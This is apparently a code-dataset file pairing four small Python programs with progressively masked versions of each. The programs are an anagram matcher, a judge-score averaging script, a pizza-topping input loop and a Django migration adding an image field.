        # Return the candidates that are anagrams of the subject word.
        return filter(self._is_anagram, words)
|
normal
|
{
"blob_id": "44224985dbfa6234eff406149ce25e1d00b512e9",
"index": 620,
"step-1": "class Anagram(object):\n <mask token>\n <mask token>\n <mask token>\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-2": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n <mask token>\n <mask token>\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-3": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n <mask token>\n\n def _is_anagram(self, word):\n return word != self.word and self._canonicalize(word) == self.canonical\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-4": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n\n def _canonicalize(self, word):\n return sorted(word.lower())\n\n def _is_anagram(self, word):\n return word != self.word and self._canonicalize(word) == self.canonical\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
# Contest score tallying
# Problem: in a programming contest, 10 judges each give a contestant a score
# between 0 and 100. The final score is the average of the remaining 8 scores
# after dropping one highest and one lowest score. Write a program to do this.
sc_lst = []
i = 1
while len(sc_lst) < 10:
    try:
        sc = int(input('Judge %d, please enter a score: ' % i))
        if 0 <= sc <= 100:
            sc_lst.append(sc)
            i += 1
        else:
            print('Out of range, input ignored')
    except ValueError:
        print('Please enter a number between 0 and 100')
max_sc = max(sc_lst)
min_sc = min(sc_lst)
sc_lst.remove(max_sc)
sc_lst.remove(min_sc)
ave_sc = sum(sc_lst) / len(sc_lst)
print('Dropped highest %d and lowest %d; the average is %.1f' % (max_sc, min_sc, ave_sc))
print('end')
|
normal
|
{
"blob_id": "a17abd3947a946daf2c453c120f2e79d2ba60778",
"index": 901,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\n<mask token>\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\n<mask token>\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-3": "sc_lst = []\ni = 1\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\nmax_sc = max(sc_lst)\nmin_sc = min(sc_lst)\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\nave_sc = sum(sc_lst) / len(sc_lst)\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-4": "# 赛场统分\n# 【问题】在编程竞赛中,有10个评委为参赛的选手打分,分数为0 ~ 100分。\n# 选手最后得分为:去掉一个最高分和一个最低分后其余8个分数的平均值。请编写一个程序实现。\n\nsc_lst = []\ni = 1\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\n\nmax_sc = max(sc_lst)\nmin_sc = min(sc_lst)\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\nave_sc = sum(sc_lst) / len(sc_lst)\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of
pizza toppings until they enter a 'quit' value. As they enter each topping,
print a message saying you’ll add that topping to their pizza.
"""
if __name__ == '__main__':
topping = None
while topping != "quit":
if topping:
print("I'll add %s to your pizza!" % topping)
topping = input("What topping would you like? (enter 'quit' when you are done.) ")
|
normal
|
{
"blob_id": "4d07795543989fe481e1141756f988d276f82c02",
"index": 5348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n topping = None\n while topping != 'quit':\n if topping:\n print(\"I'll add %s to your pizza!\" % topping)\n topping = input(\n \"What topping would you like? (enter 'quit' when you are done.) \")\n",
"step-3": "\"\"\"\n7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of\npizza toppings until they enter a 'quit' value. As they enter each topping,\nprint a message saying you’ll add that topping to their pizza.\n\"\"\"\nif __name__ == '__main__':\n topping = None\n while topping != \"quit\":\n if topping:\n print(\"I'll add %s to your pizza!\" % topping)\n topping = input(\"What topping would you like? (enter 'quit' when you are done.) \")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Generated by Django 2.2 on 2019-05-13 06:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base_data_app', '0008_key_keyslider'),
]
operations = [
migrations.AddField(
model_name='key',
name='image',
field=models.ImageField(null=True, upload_to='key', verbose_name='Картинка'),
),
]
|
normal
|
{
"blob_id": "ad53b100a1774f5429278379302b85f3a675adea",
"index": 8986,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('base_data_app', '0008_key_keyslider')]\n operations = [migrations.AddField(model_name='key', name='image', field\n =models.ImageField(null=True, upload_to='key', verbose_name=\n 'Картинка'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('base_data_app', '0008_key_keyslider')]\n operations = [migrations.AddField(model_name='key', name='image', field\n =models.ImageField(null=True, upload_to='key', verbose_name=\n 'Картинка'))]\n",
"step-5": "# Generated by Django 2.2 on 2019-05-13 06:57\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base_data_app', '0008_key_keyslider'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='key',\n name='image',\n field=models.ImageField(null=True, upload_to='key', verbose_name='Картинка'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |